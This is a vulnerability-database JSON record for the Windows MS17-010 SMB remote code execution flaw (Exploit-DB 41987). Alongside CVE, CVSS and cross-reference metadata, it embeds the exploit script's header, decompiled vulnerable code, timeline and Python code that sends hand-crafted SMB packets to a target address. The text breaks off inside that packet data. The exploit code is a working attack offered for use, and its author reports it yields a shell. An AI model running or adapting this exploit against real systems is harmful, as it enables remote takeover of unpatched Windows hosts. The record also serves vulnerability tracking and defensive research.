Execution (MS17-010). CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,CVE-2017-0148. ...", "published": "2017-05-10T00:00:00", "modified": "2017-05-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/41987/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2017-05-10T20:48:10", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010). CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,CVE-2017-0148. ...", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-05-10T20:48:10", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, 
{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, 
{"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2017-05-10T20:48:10", "rev": 2, "value": 7.9, "vector": "NONE"}}, "hash": "3120fc56ee6decfa0f172baafe5ed66776c21050b14cc94719a75d6156a2ce3a", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3707319e60a5d53f83b97b7e5aa9cf4", "key": "description"}, {"hash": "60c4e0e78ee956e23a4933b5570e4af7", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "251f7e82e99b45e17b6cf8e939e6b119", "key": "published"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", 
"key": "type"}, {"hash": "d8276e96bec8d461c00437030f01a299", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "251f7e82e99b45e17b6cf8e939e6b119", "key": "modified"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}], "history": [], "href": "https://www.exploit-db.com/exploits/41987/", "id": "EDB-ID:41987", "immutableFields": [], "lastseen": "2017-05-10T20:48:10", "modified": "2017-05-10T00:00:00", "objectVersion": "1.5", "published": "2017-05-10T00:00:00", "references": [], "reporter": "Exploit-DB", "title": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010)", "type": "exploitdb", "viewCount": 394}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-05-10T20:48:10"}], "viewCount": 400, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", 
"MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-05-10T20:48:10", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2017-05-10T20:48:10", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/41987/", "sourceData": "# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com \r\n# Date and time of release: May, 9 2017 - 13:00PM \r\n# Found this and more exploits on my open source security project: http://www.exploitpack.com \r\n#\r\n# MS17-010 - https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\r\n# Tested on: Microsoft Windows Server 2008 x64 SP1 R2 Standard \r\n#\r\n# Description: SMBv1 SrvOs2FeaToNt OOB is prone to a remote code execution\r\n# vulnerability because the application fails to perform adequate\r\n# boundary-checks on user-supplied input. 
Srv.sys processes the FEA list in SrvOs2FeaListSizeToNt,\r\n# and when that logic is not correct it leads to an out-of-bounds copy. The vulnerability trigger point is as follows:\r\n#\r\n# Vulnerable code:\r\n# unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2)\r\n# {\r\n# int v4; // edi@1\r\n# _BYTE *v5; // edi@1\r\n# unsigned int result; // eax@1\r\n# \r\n# v4 = a1 + 8;\r\n# *(_BYTE *)(a1 + 4) = *(_BYTE *)a2;\r\n# *(_BYTE *)(a1 + 5) = *(_BYTE *)(a2 + 1);\r\n# *(_WORD *)(a1 + 6) = *(_WORD *)(a2 + 2);\r\n# _memmove((void *)(a1 + 8), (const void *)(a2 + 4), *(_BYTE *)(a2 + 1));\r\n# v5 = (_BYTE *)(*(_BYTE *)(a1 + 5) + v4);\r\n# *v5++ = 0;\r\n# _memmove(v5, (const void *)(a2 + 5 + *(_BYTE *)(a1 + 5)), *(_WORD *)(a1 + 6));\r\n# result = (unsigned int)&v5[*(_WORD *)(a1 + 6) + 3] & 0xFFFFFFFC;\r\n# *(_DWORD *)a1 = result - a1;\r\n# return result;\r\n# }\r\n#\r\n# Impact: An attacker could exploit this vulnerability to execute arbitrary code in the\r\n# context of the application. Failed exploit attempts could result in a\r\n# denial-of-service condition.\r\n#\r\n# Timeline:\r\n# 04/05/2017 - Research started\r\n# 04/05/2017 - First PoC using original code\r\n# 05/05/2017 - Kernel debugging on Windows 2008\r\n# 05/05/2017 - Exploit code first draft\r\n# 06/05/2017 - Functional PoC\r\n# 07/05/2017 - Added support for Zerosum0x0 shellcode\r\n# 08/05/2017 - Code revisited and bugs fixed\r\n# 09/05/2017 - First successful shell\r\n# 09/05/2017 - Exploit tested in QA Lab\r\n# 09/05/2017 - Exploit code final review\r\n# 09/05/2017 - Publish\r\n#\r\n# Vendor homepage: http://www.microsoft.com\r\n# This exploit is a port from the amazing work made by Risksense. 
Checkout the original project at: https://github.com/RiskSense-Ops/MS17-010\r\n# Credits: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco \r\n#\r\n# How to run: python3 ms17010.py ipaddress\r\n#\r\nimport sys\r\nimport socket\r\nimport time\r\nimport ast\r\nimport binascii\r\nimport os\r\n\r\ndef mod_replay():\r\n datfile = [\"('connect', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00\\\\x88\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\r\\\\xff\\\\x00\\\\x88\\\\x00\\\\x04\\\\x11\\\\n\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xd4\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x002\\\\x001\\\\x009\\\\x005\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x005\\\\x00.\\\\x000\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 'userid', 0.0)\", \"('send', 1, 
b'\\\\x00\\\\x00\\\\x00X\\\\xffSMBu\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x04\\\\xff\\\\x00X\\\\x00\\\\x08\\\\x00\\\\x01\\\\x00-\\\\x00\\\\x00\\\\\\\\\\\\x00\\\\\\\\\\\\x001\\\\x007\\\\x002\\\\x00.\\\\x001\\\\x006\\\\x00.\\\\x009\\\\x009\\\\x00.\\\\x005\\\\x00\\\\\\\\\\\\x00I\\\\x00P\\\\x00C\\\\x00$\\\\x00\\\\x00\\\\x00?????\\\\x00', 0.0)\", \"('recv', 1, 'treeid', 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x048\\\\xffSMB\\\\xa0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x14\\\\x01\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x01\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00h\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\xec\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x
00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\
